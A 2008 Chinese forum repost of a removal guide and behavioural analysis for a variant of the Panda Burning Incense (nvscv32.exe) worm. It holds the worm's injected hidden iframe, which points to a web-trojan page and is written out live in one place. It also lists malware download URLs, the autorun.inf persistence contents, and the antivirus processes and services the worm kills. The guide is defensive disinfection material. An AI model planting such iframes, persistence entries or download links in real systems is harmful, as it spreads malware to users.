找回密码
 注册账户
查看: 723|回复: 1

熊猫烧香病毒nvscv32.exe变种手动清除方案

[复制链接]
phper 发表于 2008-4-14 01:16:08 | 显示全部楼层 |阅读模式



<BR><FONT color=#000000 size=2>&nbsp; &nbsp; </FONT>
<P><FONT color=#000000 size=2>  编者按:PConline提供了一种针对熊猫烧香病毒nvscv32.exe变种的查杀办法。据调查此变种于16日出现。笔者有幸于17日与“熊猫烧香病毒nvscv32.exe变种”亲密接触,并用以下方法将其清除。推荐使用第一种方法。</FONT></P>
<P><FONT color=#000000 size=2>  一、PConline提供的解决方案</FONT></P>
<P><FONT color=#000000 size=2>  1.拔网线;</FONT></P>
<P><FONT color=#000000 size=2>  2.重新进入WinXP安全模式,熊猫烧香病毒进程没有加载,可使用“任务管理器”!(提示:开机后按住F8)</FONT></P>
<P><FONT color=#000000 size=2>  3.删除病毒文件:%SystemRoot%system32drivers vscv32.exe。</FONT></P>
<P><FONT color=#000000 size=2>  4.开始菜单=&gt;运行,运行msconfig命令。在“系统配置实用程序”中,取消与nvscv32.exe相关的进程。也可使用超级兔子魔法设置、HijackThis等,删除nvscv32.exe的注册表启动项。</FONT></P>
<P><FONT color=#000000 size=2>  <IMG onclick=get_larger(this) src="http://img.ddvip.com/2007_02/1172235472_ddvip_3297.jpg"></FONT></P>
<P><FONT color=#000000 size=2>  取消熊猫烧香病毒进程的启动</FONT></P>
<P><FONT color=#000000 size=2>  5.下载并使用江民专杀工具,修复被感染的exe文件。并及时打上Windows补丁。</FONT></P>
<P><FONT color=#000000 size=2>  6.清除html/asp/php等,所有网页文件中如下代码:(为防止传播代码有三处修改,请将“。”换为“.”)</FONT></P>
<P><FONT color=#000000 size=2>  &lt;iframe src=http://www。krvkr。com/worm。htm width=”0” height=”0”&gt;&lt;/iframe&gt;</FONT></P>
<P><FONT color=#000000 size=2>  批量清除恶意代码的方法:</FONT></P>
<LI><FONT color=#000000 size=2>  可使用Dreamweaver的批量替换。 </FONT>
<P><FONT color=#000000 size=2>  <IMG onclick=get_larger(this) src="http://img.ddvip.com/2007_02/1172235472_ddvip_4487.jpg"></FONT></P>
<P><FONT color=#000000 size=2>  Dreamweaver批理替换的使用方法</FONT></P>
<LI><FONT color=#000000 size=2>  可下载使用</FONT><A href="http://www.brinesoft.com/Downloads.asp"><U><FONT color=#000000 size=2>BatchTextReplacer</FONT></U></A><FONT color=#000000 size=2>批量替换。 </FONT>
<LI><FONT color=#000000 size=2>  部署了Symantec AntiVirus的企业,升级到最新病毒库扫描全盘文件,即可清除被添加的恶意代码和清除病毒文件。 </FONT>
<P><FONT color=#000000 size=2>  7.用安装杀毒软件,并升级病毒库,扫描整个硬盘,清除其他病毒文件。推荐PConline多次推荐的“免费卡巴斯基”——Active Virus Sheild。(xxxxxxxxxxxxx)(注:步骤7不能与步骤5调换,以免可修复的带毒文件被删除!)</FONT></P>
<P><FONT color=#000000 size=2>  8.删除每个盘根目录下的autorun.inf文件,利用搜索功能,将Desktop_.ini全部删除。</FONT></P>
<P><FONT color=#000000 size=2>  二、互联安全网提供的解决方法(后文的病毒描述、中毒现象和技术分析均来自互联安全网)</FONT></P>
<P><FONT color=#000000 size=2>  1:关闭网络共享,断开网络。</FONT></P>
<P><FONT color=#000000 size=2>  2:使用IceSword结束掉nvscv32.exe进程(速度要快,抢在病毒感染IceSword前)</FONT></P>
<P><FONT color=#000000 size=2>  3:HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion</FONT></P>
<P><FONT color=#000000 size=2>  ExplorerAdvancedFolderHiddenSHOWALL CheckedValue的数值改为1</FONT></P>
<P><FONT color=#000000 size=2>  4:删除注册表启动项</FONT></P>
<P><FONT color=#000000 size=2>  [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]</FONT></P>
<P><FONT color=#000000 size=2>  nvscv32: "C:WINDOWSsystem32drivers vscv32.exe"</FONT></P>
<P><FONT color=#000000 size=2>  5:删除C:WINDOWSsystem32drivers vscv32.exe</FONT></P>
<P><FONT color=#000000 size=2>  6:删除每个盘根目录下的autorun.inf文件和setup.exe文件,利用搜索功能,将Desktop_.ini全部删除。</FONT></P>
<P><FONT color=#000000 size=2>  7:如果电脑上有脚本文件,将病毒代码全部删除。</FONT></P>
<P><FONT color=#000000 size=2>  8:关闭系统的自动播放功能。</FONT></P>
<P><FONT color=#000000 size=2>  这样就基本上将病毒清除了。</FONT></P>
<P><FONT color=#000000 size=2>  三、病毒描述</FONT></P>
<P><FONT color=#000000 size=2>  含有病毒体的文件被运行后,病毒将自身拷贝至系统目录,同时修改注册表将自身设置为开机启动项,并遍历各个驱动器,将自身写入磁盘根目录下,增加一个 Autorun.inf文件,使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染,并对局域网其他电脑进行扫描,同时开另外一个线程连接某网站下载木马程序进行发动恶意攻击。</FONT></P>
<P><FONT color=#000000 size=2>  文件名称:nvscv32.exe</FONT></P>
<P><FONT color=#000000 size=2>  病毒名称:目前各杀毒软件无法查杀(已经将病毒样本上报各杀毒厂商)</FONT></P>
<P><FONT color=#000000 size=2>  中文名称:(尼姆亚,熊猫烧香)</FONT></P>
<P><FONT color=#000000 size=2>  病毒大小:68,570 字节</FONT></P>
<P><FONT color=#000000 size=2>  编写语言:Borland Delphi 6.0 - 7.0</FONT></P>
<P><FONT color=#000000 size=2>  加壳方式:FSG 2.0 -&gt; bart/xt</FONT></P>
<P><FONT color=#000000 size=2>  发现时间:2007.1.16</FONT></P>
<P><FONT color=#000000 size=2>  危害等级:高</FONT></P>
<P><FONT color=#000000 size=2>  四、中毒现象</FONT></P>
<P><FONT color=#000000 size=2>  1:在系统每个分区根目录下存在setup.exe和autorun.inf文件(A和B盘不感染)。</FONT></P></LI>
<LI>
<P><FONT color=#000000 size=2>  2:无法手工修改“文件夹选项”将隐藏文件显示出来。</FONT></P>
<P><FONT color=#000000 size=2>  3:在每个感染后的文件夹中可见Desktop_ini的隐藏文件,内容为感染日期 如:2007-1-16</FONT></P>
<P><FONT color=#000000 size=2>  4:电脑上的所有脚本文件中加入以下代码:&lt;iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”&gt;&lt;/iframe&gt;</FONT></P>
<P><FONT color=#000000 size=2>  5:中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。</FONT></P>
<P><FONT color=#000000 size=2>  6:不能正常使用任务管理器,SREng.exe等工具。</FONT></P>
<P><FONT color=#000000 size=2>  7:无故的向外发包,连接局域网中其他机器。</FONT></P>
<P><FONT color=#000000 size=2>  五、技术分析</FONT></P>
<P><FONT color=#000000 size=2>  1:病毒文件运行后,将自身复制到%SystemRoot%system32drivers vscv32.exe</FONT></P>
<P><FONT color=#000000 size=2>  建立注册表自启动项:</FONT></P>
<P><FONT color=#000000 size=2>  [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]</FONT></P>
<P><FONT color=#000000 size=2>  nvscv32: "C:WINDOWSsystem32drivers vscv32.exe"</FONT></P>
<P><FONT color=#000000 size=2>  2:查找反病毒窗体病毒结束相关进程:</FONT></P></LI>
<LI><FONT color=#000000 size=2>  天网防火墙 </FONT>
<LI><FONT color=#000000 size=2>  virusscan </FONT>
<LI><FONT color=#000000 size=2>  symantec antivirus </FONT>
<LI><FONT color=#000000 size=2>  system safety monitor </FONT>
<LI><FONT color=#000000 size=2>  system repair engineer </FONT>
<LI><FONT color=#000000 size=2>  wrapped gift killer </FONT>
<LI><FONT color=#000000 size=2>  游戏木马检测大师 </FONT>
<LI><FONT color=#000000 size=2>  超级巡警 </FONT>
<P><FONT color=#000000 size=2>  3:结束以下进程</FONT></P>
<LI><FONT color=#000000 size=2>  mcshield.exe </FONT>
<LI><FONT color=#000000 size=2>  vstskmgr.exe </FONT>
<LI><FONT color=#000000 size=2>  naprdmgr.exe </FONT>
<LI><FONT color=#000000 size=2>  updaterui.exe </FONT>
<LI><FONT color=#000000 size=2>  tbmon.exe </FONT>
<LI><FONT color=#000000 size=2>  scan32.exe </FONT>
<LI><FONT color=#000000 size=2>  ravmond.exe </FONT>
<LI><FONT color=#000000 size=2>  ccenter.exe </FONT>
<LI><FONT color=#000000 size=2>  ravtask.exe </FONT>
<LI><FONT color=#000000 size=2>  rav.exe </FONT>
<LI><FONT color=#000000 size=2>  ravmon.exe </FONT>
<LI><FONT color=#000000 size=2>  ravmond.exe </FONT>
<LI><FONT color=#000000 size=2>  ravstub.exe </FONT>
<LI><FONT color=#000000 size=2>  kvxp.kxp </FONT>
<LI><FONT color=#000000 size=2>  kvmonxp.kxp </FONT>
<LI><FONT color=#000000 size=2>  kvcenter.kxp </FONT>
<LI><FONT color=#000000 size=2>  kvsrvxp.exe </FONT>
<LI><FONT color=#000000 size=2>  kregex.exe </FONT>
<LI><FONT color=#000000 size=2>  uihost.exe </FONT>
<LI><FONT color=#000000 size=2>  trojdie.kxp </FONT>
<LI><FONT color=#000000 size=2>  frogagent.exe </FONT>
<LI><FONT color=#000000 size=2>  kvxp.kxp </FONT>
<LI><FONT color=#000000 size=2>  kvmonxp.kxp </FONT>
<LI><FONT color=#000000 size=2>  kvcenter.kxp </FONT>
<LI><FONT color=#000000 size=2>  kvsrvxp.exe </FONT>
<LI><FONT color=#000000 size=2>  kregex.exe </FONT>
<LI><FONT color=#000000 size=2>  uihost.exe </FONT>
<LI><FONT color=#000000 size=2>  trojdie.kxp </FONT>
<LI><FONT color=#000000 size=2>  frogagent.exe </FONT>
<LI><FONT color=#000000 size=2>  logo1_.exe </FONT>
<LI><FONT color=#000000 size=2>  logo_1.exe </FONT>
<LI><FONT color=#000000 size=2>  rundl132.exe </FONT>
<LI><FONT color=#000000 size=2>  taskmgr.exe </FONT>
<LI><FONT color=#000000 size=2>  msconfig.exe </FONT>
<LI><FONT color=#000000 size=2>  regedit.exe </FONT>
<LI><FONT color=#000000 size=2>  sreng.exe  </FONT>
<P><FONT color=#000000 size=2>  4:禁用下列服务</FONT></P>
<LI><FONT color=#000000 size=2>  schedule </FONT>
<LI><FONT color=#000000 size=2>  sharedaccess </FONT>
<LI><FONT color=#000000 size=2>  rsccenter </FONT>
<LI><FONT color=#000000 size=2>  rsravmon </FONT>
<LI><FONT color=#000000 size=2>  rsccenter </FONT>
<LI><FONT color=#000000 size=2>  kvwsc </FONT>
<LI><FONT color=#000000 size=2>  kvsrvxp </FONT>
<LI><FONT color=#000000 size=2>  kvwsc </FONT>
<LI><FONT color=#000000 size=2>  kvsrvxp </FONT>
<LI><FONT color=#000000 size=2>  kavsvc </FONT>
<LI><FONT color=#000000 size=2>  avp </FONT>
<LI><FONT color=#000000 size=2>  avp </FONT>
<LI><FONT color=#000000 size=2>  kavsvc </FONT>
<LI><FONT color=#000000 size=2>  mcafeeframework </FONT>
<LI><FONT color=#000000 size=2>  mcshield </FONT>
<LI><FONT color=#000000 size=2>  mctaskmanager </FONT>
<LI><FONT color=#000000 size=2>  mcafeeframework </FONT>
<LI><FONT color=#000000 size=2>  mcshield </FONT>
<LI><FONT color=#000000 size=2>  mctaskmanager </FONT>
<LI><FONT color=#000000 size=2>  navapsvc </FONT>
<LI><FONT color=#000000 size=2>  wscsvc </FONT>
<LI><FONT color=#000000 size=2>  kpfwsvc </FONT>
<LI><FONT color=#000000 size=2>  sndsrvc </FONT>
<LI><FONT color=#000000 size=2>  ccproxy </FONT>
<LI><FONT color=#000000 size=2>  ccevtmgr </FONT>
<LI><FONT color=#000000 size=2>  ccsetmgr </FONT>
<LI><FONT color=#000000 size=2>  spbbcsvc </FONT>
<LI><FONT color=#000000 size=2>  symantec core lc </FONT>
<LI><FONT color=#000000 size=2>  npfmntor </FONT>
<LI><FONT color=#000000 size=2>  mskservice </FONT>
<LI><FONT color=#000000 size=2>  firesvc </FONT>
<P><FONT color=#000000 size=2>  5:删除下列注册表项:</FONT></P></LI>
<LI>
<P><FONT color=#000000 size=2>softwaremicrosoftwindowscurrentversion un avtask </FONT></P></LI>
<LI><FONT color=#000000 size=2>  softwaremicrosoftwindowscurrentversion unkvmonxp </FONT>
<LI><FONT color=#000000 size=2>  softwaremicrosoftwindowscurrentversion unkav </FONT>
<LI><FONT color=#000000 size=2>  softwaremicrosoftwindowscurrentversion unkavpersonal50 </FONT>
<LI><FONT color=#000000 size=2>  softwaremicrosoftwindowscurrentversion unmcafeeupdaterui </FONT>
<LI><FONT color=#000000 size=2>  softwaremicrosoftwindowscurrentversion un etwork associates error reporting service </FONT>
<LI><FONT color=#000000 size=2>  softwaremicrosoftwindowscurrentversion unshstatexe </FONT>
<LI><FONT color=#000000 size=2>  softwaremicrosoftwindowscurrentversion unylive.exe </FONT>
<LI><FONT color=#000000 size=2>  softwaremicrosoftwindowscurrentversion unyassistse </FONT>
<P><FONT color=#000000 size=2>  6:感染所有可执行文件,并将图标改成<IMG onclick=get_larger(this) src="http://img.ddvip.com/2007_02/1172235473_ddvip_8745.jpg">(这次不是熊猫烧香那个图标了)</FONT></P>
<P><FONT color=#000000 size=2>  7:跳过下列目录:</FONT></P>
<LI><FONT color=#000000 size=2>  windows </FONT>
<LI><FONT color=#000000 size=2>  winnt </FONT>
<LI><FONT color=#000000 size=2>  systemvolumeinformation </FONT>
<LI><FONT color=#000000 size=2>  recycled </FONT>
<LI><FONT color=#000000 size=2>  windowsnt </FONT>
<LI><FONT color=#000000 size=2>  windowsupdate </FONT>
<LI><FONT color=#000000 size=2>  windowsmediaplayer </FONT>
<LI><FONT color=#000000 size=2>  outlookexpress </FONT>
<LI><FONT color=#000000 size=2>  netmeeting </FONT>
<LI><FONT color=#000000 size=2>  commonfiles </FONT>
<LI><FONT color=#000000 size=2>  complusapplications </FONT>
<LI><FONT color=#000000 size=2>  commonfiles </FONT>
<LI><FONT color=#000000 size=2>  messenger </FONT>
<LI><FONT color=#000000 size=2>  installshieldinstallationinformation </FONT>
<LI><FONT color=#000000 size=2>  msn </FONT>
<LI><FONT color=#000000 size=2>  microsoftfrontpage </FONT>
<LI><FONT color=#000000 size=2>  moviemaker </FONT>
<LI><FONT color=#000000 size=2>  msngaminzone </FONT>
<P><FONT color=#000000 size=2>  8:删除*.gho备份文件。</FONT></P>
<P><FONT color=#000000 size=2>  9:在所有驱动器根目录建立自身文件副本setup.exe,建立autorun.inf文件使病毒自动运行,设置文件属性为隐藏、只读、系统。</FONT></P>
<P><FONT color=#000000 size=2>  autorun.inf内容:</FONT></P>
<P><FONT color=#000000 size=2>  [AutoRun]</FONT></P>
<P><FONT color=#000000 size=2>  OPEN=setup.exe</FONT></P>
<P><FONT color=#000000 size=2>  shellexecute=setup.exe</FONT></P>
<P><FONT color=#000000 size=2>  shellAutocommand=setup.exe</FONT></P>
<P><FONT color=#000000 size=2>  10:删除共享:cmd.exe /c net share admin$ /del /y</FONT></P></LI>
<LI>
<P><FONT color=#000000 size=2>  11:在机器上所有脚本文件中加入&lt;iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”&gt;&lt;/iframe&gt;,此代码地址是一个利用MS-06014漏洞攻击的网页木马,一旦用户浏览中此病毒的服务器上的网页,如果系统没有打补丁,就会下载执行此病毒。</FONT></P>
<P><FONT color=#000000 size=2>  12:扫描局域网机器,一旦发现漏洞,就迅速传播。</FONT></P>
<P><FONT color=#000000 size=2>  13:在后台访问http://www。whboy。net/update/wormcn。txt,根据下载列表下载其他病毒。</FONT></P>
<P><FONT color=#000000 size=2>  目前下载列表如下:(以下链接均为危险内容,请勿点击!)</FONT></P></LI>
<LI><FONT color=#000000 size=2>  http://www.krvkr.com/down/cq.exe </FONT>
<LI><FONT color=#000000 size=2>  http://www.krvkr.com/down/mh.exe </FONT>
<LI><FONT color=#000000 size=2>  http://www.krvkr.com/down/my.exe </FONT>
<LI><FONT color=#000000 size=2>  http://www.krvkr.com/down/wl.exe </FONT>
<LI><FONT color=#000000 size=2>  http://www.krvkr.com/down/rx.exe </FONT>
<LI><FONT color=#000000 size=2>  http://www.krvkr.com/down/wow.exe </FONT>
<LI><FONT color=#000000 size=2>  http://www.krvkr.com/down/zt.exe </FONT>
<LI><FONT color=#000000 size=2>  http://www.krvkr.com/down/wm.exe </FONT>
<LI><FONT color=#000000 size=2>  http://www.krvkr.com/down/dj.exe </FONT>
<LI><FONT color=#000000 size=2>  http://www.krvkr.com/cn/iechajian.exe </FONT>
<P><FONT color=#000000 size=2>  到此病毒行为分析完毕。</FONT></P></LI> <BR>

bingshui 发表于 2009-1-5 08:00:01 | 显示全部楼层
您需要登录后才可以回帖 登录 | 注册账户

本版积分规则

存档|黑屋|手机|网络实验室 本站服务器由美国合租以及IDCLayer国际数据提供!!!

GMT+8, 2026-6-14 04:04 , Processed in 0.011371 second(s), 9 queries , Gzip On, Redis On.

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表